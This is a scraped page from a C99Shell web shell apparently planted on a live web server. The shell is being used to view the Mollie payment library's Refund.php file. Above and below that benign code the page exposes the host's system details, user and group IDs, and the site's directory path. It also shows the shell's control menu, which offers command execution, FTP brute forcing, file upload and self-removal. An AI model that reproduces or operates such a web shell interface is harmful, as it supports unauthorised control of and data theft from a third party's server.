!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/vendor/mollie/mollie-api-php/src/Resources/   drwxr-xr-x
Free 28.45 GB of 117.98 GB (24.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Refund.php (3.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mollie\Api\Resources;

use 
Mollie\Api\Types\RefundStatus;

class 
Refund extends BaseResource
{
    use 
HasPresetOptions;

    
/**
     * Id of the payment method.
     *
     * @var string
     */
    
public $id;

    
/**
     * Mode of the refund, either "live" or "test".
     *
     * @var string
     */
    
public $mode;

    
/**
     * The $amount that was refunded.
     *
     * @var \stdClass
     */
    
public $amount;

    
/**
     * UTC datetime the payment was created in ISO-8601 format.
     *
     * @example "2013-12-25T10:30:54+00:00"
     * @var string
     */
    
public $createdAt;

    
/**
     * The refund's description, if available.
     *
     * @var string|null
     */
    
public $description;

    
/**
     * The payment id that was refunded.
     *
     * @var string
     */
    
public $paymentId;

    
/**
     * The order id that was refunded.
     *
     * @var string|null
     */
    
public $orderId;

    
/**
     * The order lines contain the actual things the customer ordered.
     * The lines will show the quantity, discountAmount, vatAmount and totalAmount
     * refunded.
     *
     * @var array|object[]|null
     */
    
public $lines;

    
/**
     * The settlement amount
     *
     * @var \stdClass
     */
    
public $settlementAmount;

    
/**
     * The refund status
     *
     * @var string
     */
    
public $status;

    
/**
     * @var \stdClass
     */
    
public $_links;

    
/**
     * An object containing information relevant to a refund issued for a split payment.
     *
     * @var array|object[]|null
     */
    
public $routingReversal;

    
/**
     * @var \stdClass|null
     */
    
public $metadata;

    
/**
     * @return bool
     */
    
public function canBeCanceled()
    {
        return 
$this->isQueued() || $this->isPending();
    }

    
/**
     * Is this refund queued?
     *
     * @return bool
     */
    
public function isQueued()
    {
        return 
$this->status === RefundStatus::STATUS_QUEUED;
    }

    
/**
     * Is this refund pending?
     *
     * @return bool
     */
    
public function isPending()
    {
        return 
$this->status === RefundStatus::STATUS_PENDING;
    }

    
/**
     * Is this refund processing?
     *
     * @return bool
     */
    
public function isProcessing()
    {
        return 
$this->status === RefundStatus::STATUS_PROCESSING;
    }

    
/**
     * Is this refund transferred to consumer?
     *
     * @return bool
     */
    
public function isTransferred()
    {
        return 
$this->status === RefundStatus::STATUS_REFUNDED;
    }

    
/**
     * Is this refund failed?
     *
     * @return bool
     */
    
public function isFailed()
    {
        return 
$this->status === RefundStatus::STATUS_FAILED;
    }

    
/**
     * Is this refund canceled?
     *
     * @return bool
     */
    
public function isCanceled()
    {
        return 
$this->status === RefundStatus::STATUS_CANCELED;
    }

    
/**
     * Cancel the refund.
     * Returns null if successful.
     *
     * @return null
     * @throws \Mollie\Api\Exceptions\ApiException
     */
    
public function cancel()
    {
        return 
$this->client->paymentRefunds->cancelForId(
            
$this->paymentId,
            
$this->id,
            
$this->getPresetOptions()
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--